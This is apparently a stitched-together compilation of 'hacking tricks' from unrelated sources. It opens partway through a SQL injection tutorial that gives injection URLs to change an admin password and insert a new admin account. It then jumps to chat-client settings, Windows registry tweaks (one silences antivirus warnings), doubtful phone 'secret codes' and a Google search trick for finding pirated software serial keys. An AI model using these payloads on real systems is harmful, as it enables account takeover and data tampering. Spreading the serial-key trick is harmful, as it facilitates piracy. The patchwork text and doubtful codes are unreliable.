
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5

Now, you can even login as 'trinity' with the password '31173'.

7.0 How to update/insert data into the database?
When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":

http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--

To INSERT a new record into the database:

http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

We can now login as "neo2" with the password of "newpas5".

8.0 How to avoid SQL Injection?
Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie

For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.

Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.

Delete stored procedures that you are not using like:

master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask

Nimbuzz BOMBUS SETTINGS FOR NEW USERS

1] LOGIN SETTINGS

1.Open Your Bombus or Bombusmod.
2.username : your id name. (dont put @nimbuzz.com)
3.password : your password
4.server: nimbuzz.com
5.host name/ip : openfire.nimbuzz.com
6.port: 5222
7.resource: www.roniksite.co.cc
8.save your account and connect.

2] CONFERENCE SETTINGS

1.Login Your Nimbuzz account
2.Then Go Conference Option On Your Bombus & select new conference
3.Then Type Your Chatroom Name Which room You Want To Enter.
4.Then Type server [ conference.nimbuzz.com]
5.Then Enter The Chatroom And Enjoying Chatting.

3] XML CONSOLE

1.Login Your Nimbuzz account
2.Goto Tool-->XML CONSOLE.
3.Enable it.

4] AUTOTRANS2CYR

1.Login Your Nimbuzz account.
2.Goto Tool->Option->Mark Autotrans2cyr
3.By this you can use stylish font in respective Bombus

5] HIDE CLIENT VERSION

1.Login Your Nimbuzz account.
2.Goto Tool->Option->UnMark Shared Platform Info

6] AUTORESPOND

1.Login Your Nimbuzz account.
2.Goto Status.
3.Then EDIT.Write your Message.
4.Set Priority 100
5.Mark ENABLE AUTORESPOND

7] INVISIBLE

1.Login Your Nimbuzz account.
2.Goto Status.
3.Set Status Invisible
4.BY this you are offline for your friends.
5.ie.you are hidden but online.

Modifying Default Desktop Icons

Start Regedit
Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ explorer \ Shell Icons
The default icons are numbered in the right panel from 0-40
Double click on the number of the particular icon you want to change. See the chart below.
Enter the name of the icon file you want to use followed by the number of the icon in that file.
Note: The numbering starts with zero.
If you use a single .ICO file, it should be followed by a 0.
e.g. - filename.dll,4 - This would actually be the 5th icon since it starts with 0.
Make sure you delete the hidden file C:\WINDOWS\SHELLICONCACHE

Below is a reference for the icons I've been able to figure out:

0 - Default Icon
1 - Default Document
2 - Application
3 - Closed Folder
4 - Open Folder
5 - 5 1/4 Drive
6 - 3 1/4 Drive
7 - Removable Drive
8 - Hard Drive
9 - Network Folder
10 - Network Offline
11 - CD
12 - RAM Drive
13 - Entire Network
15 - My Computer
16 - Printer
17 - Network Neighborhood
18 - Network Workgroup
19-27 are the Start Menu icons
19 - Programs
20 - Desktop
21 - Settings
22 - Find
23 - Help
24 - Run
25 - Suspend
27 - Shutdown

28 - Share
29 - Shortcut
31 - Recycle Bin (Empty)
32 - Recycle Bin (Full)
33 - Folder, Dial-Up Networking
34 - Desktop
36 - Program Group
40 - Audio Card

In addition, you can change:

My Computer - HKEY_CLASSES_ROOT\ CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Network Neighborhood - HKEY_CLASSES_ROOT\ CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}
InBox - HKEY_CLASSES_ROOT\ CLSID\{00020D75-0000-0000-C000-000000000046}
Recycle Bin - HKEY_CLASSES_ROOT\ CLSID\{645FF040-5081-101B-9F08-00AA002F954E}

Eliminating the Right Click on the Taskbar

To eliminate the right click on the taskbar:

Start Regedit

Start Regedit
Go to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer
Add a DWORD and give it a name of NoTrayContextMenu
Give it a value of 1
Reboot

Disable the Security Center warnings

Security is a system of safeguards designed to protect a computer system and important data from damage or access by unauthorized persons. Different antivirus and firewall programs are used to manage the security of the computer. Some time this is build-in antivirus or firewall program in windows XP to maintain the computer security. But if your windows is not provided with any antivirus, firewall program and Automatic Updates, your windows security center will alerts you a message "Your computer may be at risk. Your virus protection status is unknown" with useless repeating reminder. You can disable this message permanently by changing the values of “AntiVirusDisableNotify” in windows registry.

Follow the given steps to edit the computer registry for disable message:

First click on Start button then type Regedit in Run option.

Here locate the location to:

· HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center

Here in right side panel, double click on AntiVirusDisableNotify and set its value 1.

Now close the registry editor and restart your computer after any changes to go into effect.

Setting the Recycle Bin to Always Delete

The Recycle Bin is the special folders of windows on the hard disk to store deleted files and folders. These files or folders can be restored from the Recycle Bin to their original location if required for use. But you can set the Recycle Bin setting that the files and folders are deleted from hard disk are not placed in the Recycle Bin. So with the help of windows registry editor you can set the Recycle Bin to always delete items.

Follow the given steps to edit computer registry for Recycle Bin:
First click on Start button then type Regedit in Run option.

Here locate the location to:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Explorer\BitBucket
Here in right side panel, double click on NukeOnDelete and set its value 1. Now close the registry editor and restart your computer after any changes to go into effect.

Turning off the Help on Min, Max, Close Icons

When the mouse goes over the minimize, maximize and close icons on the upper right hand side of a window, you normally get a display telling you want those are for.
To disable that display:

Start Regedit
Go to HKEY_CURRENT_USER \ Control Panel \ Desktop
Create a String Value called MinMaxClose
Give it a value of 1
Reboot

Automatic Screen Refresh Tips

When you are working on your local computer and want to refresh any changes in your system automatically. For example some times you are watching sports results, online Stock Exchange rates and any changes to your hard drive but these changes are not usually refreshed until you press the F5 key on your keyboard.

To refresh your screen automatically you should edit your system Registry. But the best technique to edit the windows registry keys, always export or backup the whole windows registry keys on backup drive before editing. Because any mistake in Registry can cause serious problem in your computer to run properly.

Follow the given steps to change the updates automatically.

First click on Start button then type Regedit in Run option.
In Registry Editor panel go to the path:
HKEY_LOCAL_MACHINE / System / CurrentControlSet /

Control / UpdateMode

Here in right hand side panel edit the DWORD value to be between 1 and 5.
Now restart your computer after any changes to go into effect.

Top secret of Sony Ericsson mobile phones

Today tip is about the secret codes of Sony Ericsson mobile phones. These codes will work on most of the latest Sony Ericsson mobile sets. You can display the hidden information of mobile sets and then troubleshoot the routine problems using these codes.

Sony Ericsson Useful Secret Codes

Code Action

0# To display the last dial number

*#06# To display the IMEI Number of the mobile

-> * <- <- * <- * Use to display the secret menu of Sony mobile

<**< Use to display the information about mobile network

< 0 0 0 0 > Use to reset Sony Ericsson mobile default language

>*<<*<* Use to display the mobile software version

<0000> Use to reset Sony Ericsson mobile default theme

# To display the SIM Number of the mobile

**04*0000*0000*0000# You can access you mobile settings without SIM card

*#0000# Use to reset Sony Ericsson mobile English menu

904060 + > Use to reset mobile phone settings

904093 + menu Use to display the CDMA Mode

On/off button Press and release quickly on/off button to verify the battery

status. > * > (>); To display the text contained in the phone

Hidden settings of iPhone handsets

Today tip will help you to play with your iPhone mobile phones using secrets codes. These secret codes will work on most of the Apple mobile handsets. You can display the hidden information of Apple handsets and troubleshoot the routine problems with the help of these codes.

Follow the list of latest Apple codes list:

Code Action

*#06#

To display the IMEI Number of the mobile

*225# Use to display the balance detail of postpaid number

*#43# Use to verify if call waiting is enabled

*#61# Verify the number for unanswered calls

*#62# Verify the number for call forwarding if no service is available.

#67# Verify the number for call forwarding if phone is busy

*#646# Use to display the minute detail of postpaid number

*777# Use to display the balance detail of prepaid number

*3001#12345#* Display the iphone inner settings

*#33# To verify whether barring is enabled or disabled for outgoing

*#21# To display the settings for your call forwarding

Tutorial Get the serial number you need

* Go to Google.

* In the search field type: "Product name" 94FBR

* Where, "Product Name" is the name of the item you want to find the serial number for.

* And voila - there you go - the serial number you needed.

HOW DOES THIS WORK?

Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things. 1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for. 2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.

See these example searches:

"Photoshop 7" 94FBR
"Age of Mythology" 94FBR
"Nero Burning Rom 5.5" 94FBR

Latest hacking tricks